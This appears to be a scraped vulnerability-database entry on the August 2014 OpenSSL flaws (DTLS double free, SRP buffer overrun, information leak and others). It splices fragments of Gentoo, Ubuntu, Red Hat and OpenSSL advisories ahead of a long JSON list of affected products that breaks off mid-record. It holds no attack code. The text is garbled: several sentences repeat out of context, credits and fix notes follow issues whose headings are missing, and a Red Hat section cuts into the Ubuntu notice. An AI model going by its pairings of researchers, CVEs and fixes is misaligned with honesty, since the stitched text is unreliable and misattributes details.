[ 1 ] CVE-2013-6449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449 [ 2 ] CVE-2013-6450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450 [ 3 ] CVE-2014-3505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505 [ 4 ] CVE-2014-3506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506 [ 5 ] CVE-2014-3507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507 [ 6 ] CVE-2014-3509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509 [ 7 ] CVE-2014-3510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510 [ 8 ] CVE-2014-3511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511 [ 9 ] CVE-2014-3512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512 [ 10 ] CVE-2014-3513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513 [ 11 ] CVE-2014-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567 [ 12 ] CVE-2014-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568 [ 13 ] CVE-2014-5139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-39.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain applications, an attacker may use this issue to possibly gain access to sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. Solution:
The References section of this erratum contains a download link (you must log in to download the update). OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0092", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8w" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8za" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8y" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8v" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "10.0-beta", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "-release-p2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.8" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "9.2-release-p11", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7110" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "vios fp-25 sp-02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.4" }, { "model": "9.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "jboss web server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2407863" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35007383" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78450" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7101" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72250" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "hp-ux b.11.23 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x7101" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78350" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", 